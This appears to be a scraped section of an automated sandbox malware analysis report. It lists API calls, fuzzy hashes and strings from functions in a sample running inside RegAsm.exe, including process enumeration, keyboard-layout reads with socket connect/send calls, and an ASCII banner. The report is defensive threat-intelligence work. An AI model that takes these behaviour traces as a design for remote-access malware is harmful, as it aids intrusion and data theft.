• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
• Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
• Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
• Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
• Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
APIs
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
• PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
• Sleep.KERNEL32(00002710), ref: 0041AE98
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
• Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
• Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
• Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
• Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
• GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
• SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
• Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
• Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
• Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
APIs
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
• Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
• CloseHandle.KERNEL32(00000000), ref: 0040FB40
  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2180151492-0
                                                                                                                                                                                                  • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                                                                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F43F
                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                  • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                                                                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                                                                                  • _free.LIBCMT ref: 00448353
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044837A
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                  • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 493641738-0
                                                                                                                                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
APIs
• _free.LIBCMT ref: 100091D0
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 100091E2
• _free.LIBCMT ref: 100091F4
• _free.LIBCMT ref: 10009206
• _free.LIBCMT ref: 10009218
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00450A54
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 00450A66
• _free.LIBCMT ref: 00450A78
• _free.LIBCMT ref: 00450A8A
• _free.LIBCMT ref: 00450A9C
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 1000536F
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 10005381
• _free.LIBCMT ref: 10005394
• _free.LIBCMT ref: 100053A5
• _free.LIBCMT ref: 100053B6
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00444106
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 00444118
• _free.LIBCMT ref: 0044412B
• _free.LIBCMT ref: 0044413C
• _free.LIBCMT ref: 0044414D
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: t'`/
• API String ID: 0-2084328917
APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021C4988,00000010), ref: 004048E0
  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateFileKeyboardLayoutNameconnectsend
• String ID: XQG$NG$PG
• API String ID: 1634807452-3565412412
APIs
• _free.LIBCMT ref: 00453009
  • Part of subcall function 00452DF9: __alloca_probe_16.LIBCMT ref: 00452E62
  • Part of subcall function 00452DF9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452EBF
  • Part of subcall function 00452DF9: __freea.LIBCMT ref: 00452EC8
• _free.LIBCMT ref: 00452F5F
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00452F9A
  • Part of subcall function 00445B74: HeapAlloc.KERNEL32(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1317440246-2084328917
                                                                                                                                                                                                  • Opcode ID: 6f7d6b8a41de1fbed53486ea7b03a8913d460fbbb43c153e705b8e5521843823
                                                                                                                                                                                                  • Instruction ID: b42996e4f32b2ce3557a5317cf724a2d3ce4ed36614ed27229f3ff0ed108fdae
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f7d6b8a41de1fbed53486ea7b03a8913d460fbbb43c153e705b8e5521843823
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9441D571800225ABDF319F258C41FAB7BB8EF05756F00419BFD08E6296EA36CE44DB65
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                                  • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                  • API String ID: 2506810119-1068371695
                                                                                                                                                                                                  • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                  • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                                                                                                                                  • _free.LIBCMT ref: 004435E0
                                                                                                                                                                                                  • _free.LIBCMT ref: 004435EA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                  • API String ID: 2506810119-1068371695
                                                                                                                                                                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,?,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0044BBFE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B9B1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 2456169464-2084328917
                                                                                                                                                                                                  • Opcode ID: 61a1eb95f210c0310294f4f1a604aaa858dc35aa92d75ae144fe4a4ae54a0673
                                                                                                                                                                                                  • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61a1eb95f210c0310294f4f1a604aaa858dc35aa92d75ae144fe4a4ae54a0673
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00452E62
